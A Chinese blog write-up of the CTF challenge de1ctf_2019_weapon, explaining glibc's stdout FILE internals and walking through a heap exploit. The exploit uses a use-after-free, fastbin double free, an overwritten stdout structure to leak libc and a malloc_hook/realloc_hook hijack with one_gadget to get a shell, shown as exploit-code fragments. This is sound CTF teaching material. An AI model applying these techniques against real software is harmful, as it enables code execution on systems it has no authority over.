【IO系列IO_2_1_stdout】de1ctf_2019_weapon

已于 2024-11-09 21:38:32 修改
阅读量892 收藏 20
点赞数 13
分类专栏: Pwn 文章标签: 网络安全 安全 linux
于 2024-11-09 21:38:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/QYbudong/article/details/142936481
版权

目录

一、题目描述

二、题目分析

1.检查保护

2.漏洞分析

3._IO_2_1_stdout_利用详解

三、漏洞利用

四、EXP

一、题目描述

名称:de1ctf_2019_weapon

类别:Pwn

知识点:Fast Bin Attach + IO_FILE利用(stdout)

难度系数:中等

赛题链接:BUUCTF在线评测

适用条件:存在可利用堆块(如UAF),但无show函数

二、题目分析

1.检查保护

2.漏洞分析

2.1 先扔到IDA中查看,共有三个功能,分别查看一下每个功能的实现。

2.2 第一个功能create,限制了申请堆块大小在0x60以内,属于fastbin thunk。

2.3 第二个功能delete,一眼顶针存在UAF,释放堆块后未置空,可以尝试打fastbin attack。

2.4 第三个功能edit,正常修改。由于保护全开,没法直接打got,可以尝试打malloc hook,但同时由于题目没有提供show函数,所以就轮到今天的主角IO stdout登场了。

3._IO_2_1_stdout_利用详解

3.1 在Linux中提到输出,大家一定会想到puts之类的库函数,那在puts之下还有没有更底层的实现呢?答案是有的。为了增强调用链理解,建议手动步入puts函数,全流程跟一遍。 这里给大家推荐一个阅读glibc源码的网站Glibc source code (glibc-2.35) - Bootlin,可以通过右上角搜索函数定义和被调用的位置。

3.2 找一个带符号的程序,用gdb启动并对puts函数下断,run起来,用bl查看当前断点列表。通过上边的网站查看对应目录下的源码,发现是_IO_puts函数,源码放在下边了,同时我写了一些注释,方便师傅们理解。由源码可知,puts函数是由_IO_puts函数实现的,_IO_puts函数又调用了_IO_sputn,我们接着跟。

int
_IO_puts (const char *str)
{
  int result = EOF;  // 初始化返回值为 EOF,表示失败状态
  size_t len = strlen (str);  // 计算传入字符串的长度
  _IO_acquire_lock (stdout);  // 锁定 stdout,防止并发访问
  
  // 检查 stdout 的虚表偏移值是否为 0,确保它是字节流模式
  // 然后使用 _IO_sputn 函数将字符串写入 stdout,如果成功,再写入 '\n'
  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len  // 调用_IO_sputn,写入字符串
      && _IO_putc_unlocked ('\n', stdout) != EOF)  // 写入换行符
    result = MIN (INT_MAX, len + 1);  // 成功时,返回写入字符数(字符串长度+换行符)
  
  _IO_release_lock (stdout);  // 解锁 stdout
  return result;  
}

3.3 用si跟进_IO_sputn函数,发现它调用了_IO_sputn函数,_IO_sputn实际上是一个宏,它指向了_IO_2_1_stdout_的vtable中的__xsputn(源码可看glibc-2.35 - libioP.h#L176),函数名为_IO_new_file_xsputn,函数源码如下:

size_t
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
{
  const char *s = (const char *) data;
  size_t to_do = n;
  int must_flush = 0;
  size_t count = 0;

  if (n <= 0)
    return 0;
  /* This is an optimized implementation.
     If the amount to be written straddles a block boundary
     (or the filebuf is unbuffered), use sys_write directly. */

  /* First figure out how much space is available in the buffer. */
  if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
    {
      count = f->_IO_buf_end - f->_IO_write_ptr;
      if (count >= n)
	{
	  const char *p;
	  for (p = s + n; p > s; )
	    {
	      if (*--p == '\n')
		{
		  count = p - s + 1;
		  must_flush = 1;
		  break;
		}
	    }
	}
    }
  else if (f->_IO_write_end > f->_IO_write_ptr)
    count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */

  /* Then fill the buffer. */
  if (count > 0)
    {
      if (count > to_do)
	count = to_do;
      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
      s += count;
      to_do -= count;
    }
  if (to_do + must_flush > 0)
    {
      size_t block_size, do_write;
      /* Next flush the (full) buffer. */
      if (_IO_OVERFLOW (f, EOF) == EOF)
	/* If nothing else has to be written we must not signal the
	   caller that everything has been written.  */
	return to_do == 0 ? EOF : n - to_do;

      /* Try to maintain alignment: write a whole number of blocks.  */
      block_size = f->_IO_buf_end - f->_IO_buf_base;
      do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);

      if (do_write)
	{
	  count = new_do_write (f, s, do_write);
	  to_do -= count;
	  if (count < do_write)
	    return n - to_do;
	}

      /* Now write out the remainder.  Normally, this will fit in the
	 buffer, but it's somewhat messier for line-buffered files,
	 so we let _IO_default_xsputn handle the general case. */
      if (to_do)
	to_do -= _IO_default_xsputn (f, s+do_write, to_do);
    }
  return n - to_do;
}
libc_hidden_ver (_IO_new_file_xsputn, _IO_file_xsputn)

细读一下:
① _IO_new_file_xsputn传入了三个参数(FILE *f:指向目标文件的指针,const void *data:要写入的数据指针,size_t n:要写入的字节数);

② 先判断n是否大于0,如果大于0则进入缓冲区处理,否则返回0;接着,检查可用缓冲区大小,根据标志位判断是否使用行缓冲,并计算当前缓冲区的可用空间(count);

③ 如果缓冲区有可用空间,函数将尽可能多地从 data 中复制数据到缓冲区,同时更新待写入字节数;

④ 如果还有待写入的数据(to_do)或者需要强制刷新(must_flush标志位为1),调用 _IO_OVERFLOW 尝试刷新缓冲区,若刷新失败并且没有更多数据需要写入,则返回EOF;

⑤ 计算要写入的块大小和实际要写入的字节数do_write,如果有可写字节,调用new_do_write将数据写入文件,更新 to_do,并检查写入的字节数是否少于 do_write,如果是,则返回已成功写入的字节数。

⑥ 最后,如果还有剩余待写入的数据,调用 _IO_default_xsputn 处理这些数据。

3.4 所以此处有两个关键调用,_IO_OVERFLOW和new_do_write。这里我们先看_IO_OVERFLOW,它同样是一个宏,具体实现在_IO_new_file_overflow函数中。源码如下:

int
_IO_new_file_overflow (FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_IO_write_base == NULL)
	{
	  _IO_doallocbuf (f);
	  _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	}
      /* Otherwise must be currently reading.
	 If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
	 logically slide the buffer forwards one block (by setting the
	 read pointers to all point at the beginning of the block).  This
	 makes room for subsequent output.
	 Otherwise, set the read pointers to _IO_read_end (leaving that
	 alone, so it can continue to correspond to the external position). */
      if (__glibc_unlikely (_IO_in_backup (f)))
	{
	  size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
	  _IO_free_backup_area (f);
	  f->_IO_read_base -= MIN (nbackup,
				   f->_IO_read_base - f->_IO_buf_base);
	  f->_IO_read_ptr = f->_IO_read_base;
	}

      if (f->_IO_read_ptr == f->_IO_buf_end)
	f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
	f->_IO_write_end = f->_IO_write_ptr;
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);
  if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return EOF;
  *f->_IO_write_ptr++ = ch;
  if ((f->_flags & _IO_UNBUFFERED)
      || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
    if (_IO_do_write (f, f->_IO_write_base,
		      f->_IO_write_ptr - f->_IO_write_base) == EOF)
      return EOF;
  return (unsigned char) ch;
}

可以发现,这个函数中最关键的就是调用_IO_do_write (f, f->_IO_write_base,f->_IO_write_ptr - f->_IO_write_base),第一个参数为stdout结构体、第二个参数为输出缓冲区起始地址、第三个参数为输出大小。我们的目标也是进入该分支,因此要同时满足 (f->_flags & _IO_NO_WRITES) ==0 和 (f->_flags & _IO_CURRENTLY_PUTTING) == 1 来绕过前两个if分支。

因此在满足两个绕过条件的情况下,如果能控制f->_IO_write_base,就能泄露任意地址数据。_IO_do_write里边也是调用了new_do_write函数,参数一致。

3.5 接着再看 new_do_write 函数,发现其调用了 _IO_SYSWRITE 函数,到这里就不用再继续跟了,因为 _IO_SYSWRITE 函数负责将数据从用户空间写到内核空间,我们只关注用户态数据即可。由于else if分支中使用的_IO_SYSSEEK函数第二个参数是 (fp->_IO_write_base - fp->_IO_read_end),而遇到的题目基本都是只能覆盖末尾修改_IO_write_base,所以要避免进入else if,所以要满足(fp->_flags & _IO_IS_APPENDING) == 1。

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
		       && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
		       ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}

3.6 函数调用链小结:

_IO_puts => _IO_new_file_xsputn => _IO_OVERFLOW => 
_IO_do_write => new_do_write => _IO_SYSWRITE

3.7 将需要满足的绕过条件取并集,最终就是将stdout 结构体的 _flags 值修改为 0xfbad1800,把_IO_write_base 设为想泄露地址的起始位置即可。

三、漏洞利用

① 回到题目,现在有UAF,可以做fastbin double free,形成chunk1=>chunk2=>chunk1。为了申请到有libc的地址,第一时间想到了unsorted bin第一个进来的free chunk的fd指向了main_arena+88这个libc地址,但由于我们只能申请最大0x60的fastbin块,考虑先使用UAF形成堆块重叠,创造一个fake chunk从而在释放后放入unsorted bin,此时该堆块fd就指向了main_arena+88,再把这个堆块改回到fastbin链上就能把main_arena+88也放到fastbin链上。接下来我们逐步实操。

② 上边忘记说了,题目libc版本是2.23,可以使用glibc-all-in-one下载对应的libc版本,然后通过patchelf修改ld和libc,尽量不要自己手动下载libc,因为你下的不带符号,调试时gdb会无法显示bins等内容。

② 首先申请三个0x60大小的堆块和一个0x20大小的堆块(防合并到Top chunk),将1和0两个堆块依次释放,再edit(0,b'\x50'),将堆块1的fd的抬到堆块0的上方。(下面步骤的地址会和这张图有些不同,因为每次重启程序基址都会变,关注末尾三字节和size即可)

create(0x60,0,"aa")
create(0x60,1,"bb")
create(0x60,2,"cc")
create(0x20,3,"dd")#防合并

delete(1)
delete(0)

edit(0,b'\x50')

③ 接着,把chunk0申请回来(fastbin是后进先出),堆块内容帮50结尾的堆块伪造一个0x71的size;当然,这个50结尾的堆块就是chunk0的fd指向的地址,当我们再申请一个0x60大小的堆块时就把它申请回来了。至此,我们完成了堆块重叠,可以修改原chunk1的size大小来创造unsorted bin chunk。

create(0x60,4,p64(0)*9+p64(0x71))
create(0x60,5,p64(0)*3+p64(0xe1))

④ 然后,我们依次释放堆块1、0、2,堆块0和堆块2自然放到了fastbin链上,堆块1由于被修改了size,所以被放到了unsorted bin链上,且堆块1的fd指向了main_arena+88。当我们修改堆块2的fd指向堆块1时,就会自动将堆块1和main_arena+88放到fastbin链上(因为fd指向)。下面两张图分别是edit前后。

delete(1)
delete(0)
delete(2)
print("=======================================")
edit(2,b'\x70')

⑤ 为了将fastbin链上带有libc地址的堆块申请回来,要先将堆块1的size从0xe1改回0x71,这里利用堆叠的堆块5即可;这还不够,在下一次申请堆块时的size合法,我们还要把堆块1的fd末尾两字节覆盖成0x?5dd,之所以用问号,是因为地址随机化不影响地址后三位,但倒数第二字节高位我们无法判断,所以这里就需要爆破,也就是从0到f,1/16的概率。

edit(5,p64(0)*3+p64(0x71)+b'\xdd\xd5')

⑥ 再写细一点,为什么要改成0x?5dd?这里有个小技巧,在stdout - 0x43的位置存在一个0x7f数据,从减的数据不是整数而是dd和43就能知道这里使用了错位的技巧,这个7f本是一个地址的开头,为了申请到合法的堆块,我们将其作为size,同时这个size也是7?,正好符合fastbin chunk大小且末字节不为0。本题libc2.23的stdout是0x3C5620,后三字节0x620减去0x43正好是0x5dd。

⑦ 我们可以用上一章节的技巧覆盖stdout结构体,修改_flags为0xfbad1800,泄露出的地址是_IO_2_1_stderr_+192的地址。

create(0x60,7,b'ee')
create(0x60,8,b'ff')
create(0x60,9,b'\x00'*3+p64(0)*6+p64(0xfbad1877)+p64(0)*3+b'\x00')

⑧ 最后劫持malloc_hook,如同⑥中提到的错位0x7f一样,在malloc_hook-0x23同样有一个0x7f,借此将malloc_hook申请出来,但malloc_hook不好用(ogg条件不满足),因此将malloc_hook写为realloc,realloc函数开头有调整栈值的指令(pop和push,具体参考奇安信攻防社区-[CTF-PWN] Hook函数劫持),将realloc_hook(在malloc_hook下)覆盖为ogg即可。

leak_libc_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak_libc_addr-libc.sym["_IO_2_1_stderr_"]-192
malloc_hook = libc_base+libc.symbols["__malloc_hook"]
ogg_list=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg_addr = libc_base+ogg_list[1]

create(0x60,10,"gg")

delete(0)
edit(0,p64(malloc_hook-0x23))
create(0x60,11,"hh")
create(0x60,12,b'\x00'*11+p64(ogg_addr)+p64(libc_base+libc.sym['realloc']+4))

p.sendlineafter(b'choice >>',str(1))
p.sendlineafter(b'weapon: ',str(40))
p.sendlineafter(b'index: ',str(40))

四、EXP

依然不给完整EXP嗷,上边每块都写的很详细了,尝试自己写一遍,外层套个循环爆破即可。点个赞吧~

De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1196
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
重学IO:利用_IO_2_1_stdout泄露libc
最新发布
2301_79327647的博客
08-19 1059
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35。
【八芒星计划】 _IO_2_1_stdout_和_IO_2_1_stdin_ 的任意地址读和任意地址写
carol2358的博客
09-04 997
文章目录前言一、GKCTF2020]Domo总结 前言 这篇记一下任意地址读和任意地址写 _IO_2_1_stdout_的任意地址读,_IO_write_base为读取的起始地址,_IO_write_ptr为读取的末地址,并且flag的值要得是0xfbad1800才能正常读取   _IO_2_1_stdin_的任意地址写跟_IO_2_1_stdout_的任意地址读类似,也是需要控制flag还有_IO_buf_base和_IO_buf_end。 这回除了flag、_IO_buf_base和_IO_b
好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
hollk’s blog
02-19 6325
前言 这道题是wiki上tcache attack部分的第二道例题,原题在wiki那个题包里,需要自己找一下,忘记在哪了。。。。。其实个人感觉这道题的考点并不是tcache attack,而是在于IO_FILE的利用。因为这道题与以往所见并不太相同,并没有输出函数,也就意味着无法通过往常的方式利用程序自身的输出函数进行泄露内存地址,所以这时候就需要利用IO_FILE的方式进行输出(我也是第一次遇到,肝了好几天)。这篇文章主要分为两个部分,前半部分主要讲解IO_FILE泄露libc的方式,后半部分是HITCO
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1120
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1640
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 2094
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 340
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
de1ctf_2019_weapon
doudoudedi
05-06 746
这题我多了一个换行搞了老久了服了还是tcl 思路 有uaf通过写IO来得到libc地址然后通过double free来拿到shell exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./de1ctf_2019_weapon') p=remote('node3.buuoj.cn',292...
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 387
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
de1ctf_2019_weaponIO_leak,doublefree)
m0_51251108的博客
11-17 503
de1ctf_2019_weapon: 保护全开
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 446
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
De1CTF weapon 经验总结
qq_43189757的博客
10-04 824
第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下 1.泄露libc 由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址 具体步骤: 1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chun...
De1CTF-2019部分wp
CTF小白的博客
08-05 2335
目录Misc1——We1comeMisc2——Mine SweepingWeb1——SSRF MeCrypto1——xorz 去De1CTF划了划水,发现自己是真的菜━┳━ ━┳━ Misc1——We1come https://t.me/De1CTF ,需要加Telegram群,需要VPN,群里有发签到的flag Misc2——Mine Sweeping 下载下来是一个扫雷游戏 在没有雷的地...
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 867
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1255
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
glibc中的printf如何输出到串口
系统运维
01-03 246
glibc中的printf如何输出到串口 内核版本:2.6.14 glibc版本:2.3.6 CPU平台:arm 嵌入式开发交流群:289195589,欢迎加入! printf的输出不一定是串口,也可以是LCD,甚至是文件等,这里仅以输出到串口为例。本文分析了printf和文件描述符0、12以及stdout、stdin和stderr的关系,通过这篇文章可以知道文件描述符0、12为什么对应着s...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值